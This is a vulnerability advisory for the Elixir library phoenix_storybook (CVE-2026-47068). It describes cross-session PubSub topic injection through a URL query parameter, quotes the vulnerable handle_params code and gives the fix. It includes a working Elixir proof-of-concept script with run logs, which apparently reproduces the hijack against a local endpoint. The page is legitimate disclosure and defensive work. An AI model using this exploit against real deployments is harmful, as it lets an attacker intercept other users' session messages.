GHSA-MRHX-6PW9-Q5FH

Vulnerability from github – Published: 2026-06-09 21:59 – Updated: 2026-06-09 21:59
VLAI
Summary
PhoenixStorybook has cross-session PubSub topic injection via URL parameter
Details

Summary

The storybook iframe LiveView accepts a PubSub topic from the URL query string and broadcasts its own pid onto that topic with no check that the topic belongs to the current session. Any unauthenticated visitor who knows or guesses another user's playground topic can hijack the playground↔iframe handshake, causing the victim's playground to send its control messages to an attacker-controlled iframe process — a cross-session information leak.

Likely introduced in https://github.com/phenixdigital/phoenix_storybook/commit/8c2c97b0f505780fee4069988bf86736f51d35d7

Details

PhoenixStorybook.Story.ComponentIframeLive.handle_params/3 (lib/phoenix_storybook/live/story/component_iframe_live.ex:24-30) takes the topic straight from params["topic"] and broadcasts on it:

if topic = params["topic"] do
  Phoenix.PubSub.broadcast!(
    PhoenixStorybook.PubSub, topic, {:component_iframe_pid, self()}
  )
end

The shared PhoenixStorybook.PubSub is used to coordinate playground LiveViews with their iframes: a playground subscribes to a topic, learns the iframe's pid from the {:component_iframe_pid, _} message, and then uses send/2 to deliver subsequent state and control messages (variation state, theme switches, extra-assign payloads, etc.) directly to that pid.

Because the iframe trusts the query parameter, an attacker who loads /storybook/iframe/<story>?topic=<victim_topic> in their own browser causes their iframe process's pid to be announced on the victim's private topic. The victim's playground then addresses its private messages to the attacker's iframe, where they arrive in handle_info/2. There is no authentication, ownership check, or binding between the topic and the requesting session.

The fix is to stop accepting the topic from the query string — derive it server-side from the LiveView session (or pass the playground pid via a signed session) and refuse to broadcast on any topic the current session does not own. Alternatively, nest the iframe LiveView under the playground so its pid is known directly and the broadcast-based discovery is removed.

PoC

The attached script reproduces the leak end-to-end against a real Phoenix endpoint mounting the library's own router via live_storybook("/storybook", backend_module: MyStorybook). The threat model is an outside attacker who can reach the storybook iframe URL; the only entry point used is a plain HTTP GET /storybook/iframe/<story>?topic=<victim_topic>, which mounts ComponentIframeLive and triggers the vulnerable handle_params/3 call site shown above.

To simulate a legitimate playground, the script spawns a "victim" process that calls Phoenix.PubSub.subscribe(PhoenixStorybook.PubSub, victim_topic) with a freshly generated secret topic. The attacker session — completely separate, with no shared cookies or auth — then issues a single Req.get! to the iframe URL with ?topic=<victim_topic> URL-encoded onto the query string. Inside the iframe LiveView, params["topic"] is the attacker-supplied value, and Phoenix.PubSub.broadcast!/3 delivers {:component_iframe_pid, self()} to the victim's subscription. No authentication or token is needed; the only precondition is knowing (or guessing) the victim's topic.

The victim process pattern-matches on {:component_iframe_pid, attacker_iframe_pid} and forwards it to the test harness. The script prints VERIFIED: attacker-controlled "?topic=" query param caused PubSub broadcast onto victim's private topic along with the leaked pid when the cross-session message arrives, and NOT VERIFIED if nothing arrives within the timeout. The full script is attached below under "Scripts and Logs".

Impact

Cross-session information disclosure and message injection in any application that exposes phoenix_storybook over an HTTP boundary. Any unauthenticated user who can reach the iframe route and learn or guess a playground's topic can redirect the playground's private control messages — variation state, theme changes, and any developer-wired extra assigns — to an iframe process they control. There is no auth check on the broadcast, so the only precondition is reachability of the iframe URL plus knowledge of a target topic.

Scripts and Logs

# Verifies: Cross-session PubSub topic injection via URL parameter
#
# Run: elixir cross_session_pubsub_topic_injection_via_url_parameter_1352.exs
#
# Threat model: an outside attacker who can browse the storybook iframe URL.
# They open `/storybook/iframe/<story>?topic=<victim_topic>` in their own
# browser. The iframe LiveView's handle_params broadcasts
# `{:component_iframe_pid, self()}` on whatever topic the attacker put in the
# query string. A victim's playground that subscribed to `victim_topic`
# (legitimately, for its own iframe) receives the attacker's iframe pid and
# will subsequently address its private control messages to that pid.
#
# This PoC stands up a real Phoenix endpoint + the library's own router, has a
# "victim" process Phoenix.PubSub.subscribe to a secret topic, then makes a
# plain HTTP GET to the iframe URL with `?topic=<secret>` from an attacker
# session. If the victim receives the iframe pid, the topic was successfully
# hijacked.

Mix.install([
  {:phoenix_storybook, "1.0.0"},
  {:phoenix_live_view, "~> 1.0"},
  {:bandit, "~> 1.5"},
  {:req, "~> 0.5"},
  {:jason, "~> 1.4"}
])

# ----- 1. Minimum on-disk story so the iframe LV actually mounts. -----
tmp = Path.join(System.tmp_dir!(), "psb_poc_#{System.unique_integer([:positive])}")
File.mkdir_p!(tmp)

File.write!(Path.join(tmp, "demo.story.exs"), """
defmodule Storybook.Demo do
  use PhoenixStorybook.Story, :component
  def function, do: &Phoenix.Component.link/1
  def variations do
    [%Variation{id: :default, attributes: %{navigate: "/x"}, slots: ["hi"]}]
  end
end
""")

# ----- 2. Storybook backend + Phoenix endpoint/router. -----
expanded_content_path = Path.expand(tmp)

Module.create(
  MyStorybook,
  quote do
    use PhoenixStorybook, otp_app: :psb_poc, content_path: unquote(expanded_content_path)
  end,
  Macro.Env.location(__ENV__)
)

defmodule MyRouter do
  use Phoenix.Router
  import Phoenix.LiveView.Router
  import PhoenixStorybook.Router

  scope "/" do
    live_storybook("/storybook", backend_module: MyStorybook)
  end
end

poc_port = Enum.random(20_000..30_000)

Application.put_env(:psb_poc, MyEndpoint,
  http: [ip: {127, 0, 0, 1}, port: poc_port],
  server: true,
  secret_key_base: String.duplicate("a", 64),
  live_view: [signing_salt: "12345678"],
  pubsub_server: PhoenixStorybook.PubSub,
  adapter: Bandit.PhoenixAdapter,
  check_origin: false
)

defmodule MyEndpoint do
  use Phoenix.Endpoint, otp_app: :psb_poc

  @session_options [
    store: :cookie,
    key: "_psb_poc_key",
    signing_salt: "12345678",
    same_site: "Lax"
  ]

  socket "/live", Phoenix.LiveView.Socket, websocket: true
  plug Plug.Session, @session_options
  plug :fetch_query_params_plug
  plug MyRouter

  def fetch_query_params_plug(conn, _opts), do: Plug.Conn.fetch_query_params(conn)
end

# ----- 3. Boot endpoint (PhoenixStorybook.PubSub is started by the lib app). -----
{:ok, _} = MyEndpoint.start_link()

base = "http://127.0.0.1:#{poc_port}"

# ----- 4. Victim subscribes to its private playground topic. -----
victim_topic = "playground-secret-#{:erlang.unique_integer([:positive])}"
victim = self()

# A separate process plays the role of the victim's playground LV. It
# subscribes to its own topic — exactly what PlaygroundLive does when the
# legitimate user opens their playground page.
victim_pid =
  spawn_link(fn ->
    :ok = Phoenix.PubSub.subscribe(PhoenixStorybook.PubSub, victim_topic)
    send(victim, :victim_ready)

    receive do
      {:component_iframe_pid, attacker_iframe_pid} ->
        send(victim, {:victim_got, attacker_iframe_pid})
    after
      5_000 -> send(victim, :victim_timeout)
    end
  end)

receive do
  :victim_ready -> :ok
after
  2_000 -> raise "victim subscribe timed out"
end

# ----- 5. Attacker, in a completely unrelated session, hits the iframe URL
#         with ?topic=<victim's secret topic>. -----
attacker_url =
  base <>
    "/storybook/iframe/demo?topic=" <> URI.encode_www_form(victim_topic)

_resp = Req.get!(attacker_url, retry: false)

# ----- 6. Observe the cross-session leak. -----
outcome =
  receive do
    {:victim_got, leaked_pid} -> {:leaked, leaked_pid}
    :victim_timeout -> :no_leak
  after
    6_000 -> :no_leak
  end

# ----- 7. Tear down. -----
:ok = Supervisor.stop(MyEndpoint, :normal)
File.rm_rf!(tmp)
if Process.alive?(victim_pid), do: Process.exit(victim_pid, :kill)

case outcome do
  {:leaked, pid} ->
    IO.puts("Victim received iframe pid: #{inspect(pid)}")
    IO.puts("Victim's topic was: #{victim_topic} (never shared with attacker session)")
    IO.puts("Attacker only needed to know/guess that topic to hijack the pid handshake.")
    IO.puts("VERIFIED: attacker-controlled `?topic=` query param caused PubSub broadcast onto victim's private topic")

  :no_leak ->
    IO.puts("NOT VERIFIED: no cross-session message observed within timeout")
end

Logs

11:56:17.598 [warning] Can't resolve priv dir for application psb_poc

11:56:17.750 [info] Running MyEndpoint with Bandit 1.11.1 at 127.0.0.1:26466 (http)

11:56:17.750 [info] Access MyEndpoint at http://localhost:26466

11:56:17.790 [debug] Processing with PhoenixStorybook.Story.ComponentIframeLive.__live__/0
  Parameters: %{"story" => ["demo"], "topic" => "playground-secret-8"}
  Pipelines: [:storybook_browser]
Victim received iframe pid: #PID<0.598.0>
Victim's topic was: playground-secret-8 (never shared with attacker session)
Attacker only needed to know/guess that topic to hijack the pid handshake.
VERIFIED: attacker-controlled `?topic=` query param caused PubSub broadcast onto victim's private topic
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "phoenix_storybook"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.4.0"
            },
            {
              "fixed": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47068"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-09T21:59:25Z",
    "nvd_published_at": "2026-05-20T14:17:01Z",
    "severity": "LOW"
  },
  "details": "### Summary\nThe storybook iframe LiveView accepts a PubSub topic from the URL query string and broadcasts its own pid onto that topic with no check that the topic belongs to the current session. Any unauthenticated visitor who knows or guesses another user\u0027s playground topic can hijack the playground\u2194iframe handshake, causing the victim\u0027s playground to send its control messages to an attacker-controlled iframe process \u2014 a cross-session information leak.\n\nLikely introduced in https://github.com/phenixdigital/phoenix_storybook/commit/8c2c97b0f505780fee4069988bf86736f51d35d7\n\n### Details\n`PhoenixStorybook.Story.ComponentIframeLive.handle_params/3` (lib/phoenix_storybook/live/story/component_iframe_live.ex:24-30) takes the topic straight from `params[\"topic\"]` and broadcasts on it:\n\n```elixir\nif topic = params[\"topic\"] do\n  Phoenix.PubSub.broadcast!(\n    PhoenixStorybook.PubSub, topic, {:component_iframe_pid, self()}\n  )\nend\n```\n\nThe shared `PhoenixStorybook.PubSub` is used to coordinate playground LiveViews with their iframes: a playground subscribes to a topic, learns the iframe\u0027s pid from the `{:component_iframe_pid, _}` message, and then uses `send/2` to deliver subsequent state and control messages (variation state, theme switches, extra-assign payloads, etc.) directly to that pid.\n\nBecause the iframe trusts the query parameter, an attacker who loads `/storybook/iframe/\u003cstory\u003e?topic=\u003cvictim_topic\u003e` in their own browser causes their iframe process\u0027s pid to be announced on the victim\u0027s private topic. The victim\u0027s playground then addresses its private messages to the attacker\u0027s iframe, where they arrive in `handle_info/2`. There is no authentication, ownership check, or binding between the topic and the requesting session.\n\nThe fix is to stop accepting the topic from the query string \u2014 derive it server-side from the LiveView session (or pass the playground pid via a signed session) and refuse to broadcast on any topic the current session does not own. Alternatively, nest the iframe LiveView under the playground so its pid is known directly and the broadcast-based discovery is removed.\n\n### PoC\nThe attached script reproduces the leak end-to-end against a real Phoenix endpoint mounting the library\u0027s own router via `live_storybook(\"/storybook\", backend_module: MyStorybook)`. The threat model is an outside attacker who can reach the storybook iframe URL; the only entry point used is a plain HTTP `GET /storybook/iframe/\u003cstory\u003e?topic=\u003cvictim_topic\u003e`, which mounts `ComponentIframeLive` and triggers the vulnerable `handle_params/3` call site shown above.\n\nTo simulate a legitimate playground, the script spawns a \"victim\" process that calls `Phoenix.PubSub.subscribe(PhoenixStorybook.PubSub, victim_topic)` with a freshly generated secret topic. The attacker session \u2014 completely separate, with no shared cookies or auth \u2014 then issues a single `Req.get!` to the iframe URL with `?topic=\u003cvictim_topic\u003e` URL-encoded onto the query string. Inside the iframe LiveView, `params[\"topic\"]` is the attacker-supplied value, and `Phoenix.PubSub.broadcast!/3` delivers `{:component_iframe_pid, self()}` to the victim\u0027s subscription. No authentication or token is needed; the only precondition is knowing (or guessing) the victim\u0027s topic.\n\nThe victim process pattern-matches on `{:component_iframe_pid, attacker_iframe_pid}` and forwards it to the test harness. The script prints `VERIFIED: attacker-controlled \"?topic=\" query param caused PubSub broadcast onto victim\u0027s private topic` along with the leaked pid when the cross-session message arrives, and `NOT VERIFIED` if nothing arrives within the timeout. The full script is attached below under \"Scripts and Logs\".\n\n### Impact\nCross-session information disclosure and message injection in any application that exposes `phoenix_storybook` over an HTTP boundary. Any unauthenticated user who can reach the iframe route and learn or guess a playground\u0027s topic can redirect the playground\u0027s private control messages \u2014 variation state, theme changes, and any developer-wired extra assigns \u2014 to an iframe process they control. There is no auth check on the broadcast, so the only precondition is reachability of the iframe URL plus knowledge of a target topic.\n\n## Scripts and Logs\n\n```elixir\n# Verifies: Cross-session PubSub topic injection via URL parameter\n#\n# Run: elixir cross_session_pubsub_topic_injection_via_url_parameter_1352.exs\n#\n# Threat model: an outside attacker who can browse the storybook iframe URL.\n# They open `/storybook/iframe/\u003cstory\u003e?topic=\u003cvictim_topic\u003e` in their own\n# browser. The iframe LiveView\u0027s handle_params broadcasts\n# `{:component_iframe_pid, self()}` on whatever topic the attacker put in the\n# query string. A victim\u0027s playground that subscribed to `victim_topic`\n# (legitimately, for its own iframe) receives the attacker\u0027s iframe pid and\n# will subsequently address its private control messages to that pid.\n#\n# This PoC stands up a real Phoenix endpoint + the library\u0027s own router, has a\n# \"victim\" process Phoenix.PubSub.subscribe to a secret topic, then makes a\n# plain HTTP GET to the iframe URL with `?topic=\u003csecret\u003e` from an attacker\n# session. If the victim receives the iframe pid, the topic was successfully\n# hijacked.\n\nMix.install([\n  {:phoenix_storybook, \"1.0.0\"},\n  {:phoenix_live_view, \"~\u003e 1.0\"},\n  {:bandit, \"~\u003e 1.5\"},\n  {:req, \"~\u003e 0.5\"},\n  {:jason, \"~\u003e 1.4\"}\n])\n\n# ----- 1. Minimum on-disk story so the iframe LV actually mounts. -----\ntmp = Path.join(System.tmp_dir!(), \"psb_poc_#{System.unique_integer([:positive])}\")\nFile.mkdir_p!(tmp)\n\nFile.write!(Path.join(tmp, \"demo.story.exs\"), \"\"\"\ndefmodule Storybook.Demo do\n  use PhoenixStorybook.Story, :component\n  def function, do: \u0026Phoenix.Component.link/1\n  def variations do\n    [%Variation{id: :default, attributes: %{navigate: \"/x\"}, slots: [\"hi\"]}]\n  end\nend\n\"\"\")\n\n# ----- 2. Storybook backend + Phoenix endpoint/router. -----\nexpanded_content_path = Path.expand(tmp)\n\nModule.create(\n  MyStorybook,\n  quote do\n    use PhoenixStorybook, otp_app: :psb_poc, content_path: unquote(expanded_content_path)\n  end,\n  Macro.Env.location(__ENV__)\n)\n\ndefmodule MyRouter do\n  use Phoenix.Router\n  import Phoenix.LiveView.Router\n  import PhoenixStorybook.Router\n\n  scope \"/\" do\n    live_storybook(\"/storybook\", backend_module: MyStorybook)\n  end\nend\n\npoc_port = Enum.random(20_000..30_000)\n\nApplication.put_env(:psb_poc, MyEndpoint,\n  http: [ip: {127, 0, 0, 1}, port: poc_port],\n  server: true,\n  secret_key_base: String.duplicate(\"a\", 64),\n  live_view: [signing_salt: \"12345678\"],\n  pubsub_server: PhoenixStorybook.PubSub,\n  adapter: Bandit.PhoenixAdapter,\n  check_origin: false\n)\n\ndefmodule MyEndpoint do\n  use Phoenix.Endpoint, otp_app: :psb_poc\n\n  @session_options [\n    store: :cookie,\n    key: \"_psb_poc_key\",\n    signing_salt: \"12345678\",\n    same_site: \"Lax\"\n  ]\n\n  socket \"/live\", Phoenix.LiveView.Socket, websocket: true\n  plug Plug.Session, @session_options\n  plug :fetch_query_params_plug\n  plug MyRouter\n\n  def fetch_query_params_plug(conn, _opts), do: Plug.Conn.fetch_query_params(conn)\nend\n\n# ----- 3. Boot endpoint (PhoenixStorybook.PubSub is started by the lib app). -----\n{:ok, _} = MyEndpoint.start_link()\n\nbase = \"http://127.0.0.1:#{poc_port}\"\n\n# ----- 4. Victim subscribes to its private playground topic. -----\nvictim_topic = \"playground-secret-#{:erlang.unique_integer([:positive])}\"\nvictim = self()\n\n# A separate process plays the role of the victim\u0027s playground LV. It\n# subscribes to its own topic \u2014 exactly what PlaygroundLive does when the\n# legitimate user opens their playground page.\nvictim_pid =\n  spawn_link(fn -\u003e\n    :ok = Phoenix.PubSub.subscribe(PhoenixStorybook.PubSub, victim_topic)\n    send(victim, :victim_ready)\n\n    receive do\n      {:component_iframe_pid, attacker_iframe_pid} -\u003e\n        send(victim, {:victim_got, attacker_iframe_pid})\n    after\n      5_000 -\u003e send(victim, :victim_timeout)\n    end\n  end)\n\nreceive do\n  :victim_ready -\u003e :ok\nafter\n  2_000 -\u003e raise \"victim subscribe timed out\"\nend\n\n# ----- 5. Attacker, in a completely unrelated session, hits the iframe URL\n#         with ?topic=\u003cvictim\u0027s secret topic\u003e. -----\nattacker_url =\n  base \u003c\u003e\n    \"/storybook/iframe/demo?topic=\" \u003c\u003e URI.encode_www_form(victim_topic)\n\n_resp = Req.get!(attacker_url, retry: false)\n\n# ----- 6. Observe the cross-session leak. -----\noutcome =\n  receive do\n    {:victim_got, leaked_pid} -\u003e {:leaked, leaked_pid}\n    :victim_timeout -\u003e :no_leak\n  after\n    6_000 -\u003e :no_leak\n  end\n\n# ----- 7. Tear down. -----\n:ok = Supervisor.stop(MyEndpoint, :normal)\nFile.rm_rf!(tmp)\nif Process.alive?(victim_pid), do: Process.exit(victim_pid, :kill)\n\ncase outcome do\n  {:leaked, pid} -\u003e\n    IO.puts(\"Victim received iframe pid: #{inspect(pid)}\")\n    IO.puts(\"Victim\u0027s topic was: #{victim_topic} (never shared with attacker session)\")\n    IO.puts(\"Attacker only needed to know/guess that topic to hijack the pid handshake.\")\n    IO.puts(\"VERIFIED: attacker-controlled `?topic=` query param caused PubSub broadcast onto victim\u0027s private topic\")\n\n  :no_leak -\u003e\n    IO.puts(\"NOT VERIFIED: no cross-session message observed within timeout\")\nend\n\n```\n\n### Logs\n\n```logs\n11:56:17.598 [warning] Can\u0027t resolve priv dir for application psb_poc\n\n11:56:17.750 [info] Running MyEndpoint with Bandit 1.11.1 at 127.0.0.1:26466 (http)\n\n11:56:17.750 [info] Access MyEndpoint at http://localhost:26466\n\n11:56:17.790 [debug] Processing with PhoenixStorybook.Story.ComponentIframeLive.__live__/0\n  Parameters: %{\"story\" =\u003e [\"demo\"], \"topic\" =\u003e \"playground-secret-8\"}\n  Pipelines: [:storybook_browser]\nVictim received iframe pid: #PID\u003c0.598.0\u003e\nVictim\u0027s topic was: playground-secret-8 (never shared with attacker session)\nAttacker only needed to know/guess that topic to hijack the pid handshake.\nVERIFIED: attacker-controlled `?topic=` query param caused PubSub broadcast onto victim\u0027s private topic\n```",
  "id": "GHSA-mrhx-6pw9-q5fh",
  "modified": "2026-06-09T21:59:25Z",
  "published": "2026-06-09T21:59:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-mrhx-6pw9-q5fh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47068"
    },
    {
      "type": "WEB",
      "url": "https://github.com/phenixdigital/phoenix_storybook/commit/6ee03f1c738d4436dde1b066cf65c80663d489f5"
    },
    {
      "type": "WEB",
      "url": "https://cna.erlef.org/cves/CVE-2026-47068.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/phenixdigital/phoenix_storybook"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-47068"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PhoenixStorybook has cross-session PubSub topic injection via URL parameter"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…